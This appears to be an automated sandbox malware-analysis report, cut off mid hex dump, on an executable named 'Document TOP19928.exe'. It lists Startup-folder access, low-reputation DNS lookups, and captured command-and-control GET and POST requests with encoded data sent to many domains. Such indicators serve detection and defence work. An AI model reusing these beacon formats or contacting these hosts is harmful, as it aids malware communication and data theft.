Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: www.joyesi.xyz

Source: unknown

Network traffic detected: IP country count 11

Source: Joe Sandbox View	IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View	IP Address: 116.50.37.244 116.50.37.244
Source: Joe Sandbox View	IP Address: 23.227.38.74 23.227.38.74

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_008425E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_008425E2

Source: global traffic	HTTP traffic detected: GET /fo8o/?Y8F=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==&9brL_=BThPe0S0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?Y8F=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8tsmJ5wYjg7yHR75gTEM7bFlUHlp6xhVA3OjEJ21e5ZGGZA==&9brL_=BThPe0S0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.kasegitai.tokyoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?Y8F=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==&9brL_=BThPe0S0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?Y8F=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Zb05UwcAkaB2J1Kzvv1yGe3hS8juJnkbDr/1EuGpo+UJ9gA==&9brL_=BThPe0S0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.antonio-vivaldi.mobiConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?Y8F=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==&9brL_=BThPe0S0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?Y8F=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&9brL_=BThPe0S0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?Y8F=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&9brL_=BThPe0S0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?Y8F=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==&9brL_=BThPe0S0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?Y8F=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pDTGgZiIm8sV5rhtCXud2beKoow48CYPqOXsFqBfVEoJ79g==&9brL_=BThPe0S0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.donnavariedades.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?Y8F=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrINr9TZW+RNBVQYBQJyEcpoFJRXOlD4bLupvYs9MkX8JY0Q==&9brL_=BThPe0S0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.660danm.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?Y8F=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&9brL_=BThPe0S0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?Y8F=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBSD8DGilcFUIaw9KGDa8hSIpxJ4Da6NkwMKTsgVvIjwNNkg==&9brL_=BThPe0S0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.shenzhoucui.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?Y8F=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBMWUTkQYjuMJYaMZeWEVjYdmGCyAvzXT+cvLf21wqhucucw==&9brL_=BThPe0S0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.b301.spaceConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?Y8F=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==&9brL_=BThPe0S0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Source: global traffic	DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic	DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic	DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic	DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic	DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic	DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic	DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic	DNS traffic detected: DNS query: www.techchains.info
Source: global traffic	DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic	DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic	DNS traffic detected: DNS query: www.660danm.top
Source: global traffic	DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic	DNS traffic detected: DNS query: www.joyesi.xyz
Source: global traffic	DNS traffic detected: DNS query: www.k9vyp11no3.cfd
Source: global traffic	DNS traffic detected: DNS query: www.shenzhoucui.com
Source: global traffic	DNS traffic detected: DNS query: www.b301.space

Source: unknown

HTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.kasegitai.tokyoOrigin: http://www.kasegitai.tokyoCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 204Referer: http://www.kasegitai.tokyo/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 59 38 46 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 48 50 75 37 52 67 5a 78 70 4d 5a 42 33 6f 64 4f 69 33 58 66 51 36 33 6a 67 67 56 65 72 38 4c 57 2b 46 67 66 30 67 3d Data Ascii: Y8F=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmffHPu7RgZxpMZB3odOi3XfQ63jggVer8LW+Fgf0g=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Jun 2024 12:55:24 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jun 2024 12:55:40 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jun 2024 12:55:43 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jun 2024 12:55:45 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jun 2024 12:55:48 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 26 Jun 2024 12:56:21 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-06-26T12:56:26.3183935Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 26 Jun 2024 12:56:23 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-06-26T12:56:26.3183935Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 26 Jun 2024 12:56:26 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-06-26T12:56:31.4099707Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 26 Jun 2024 12:56:28 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-06-26T12:56:33.8745070Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jun 2024 12:56:56 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Jun 2024 12:56:58 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 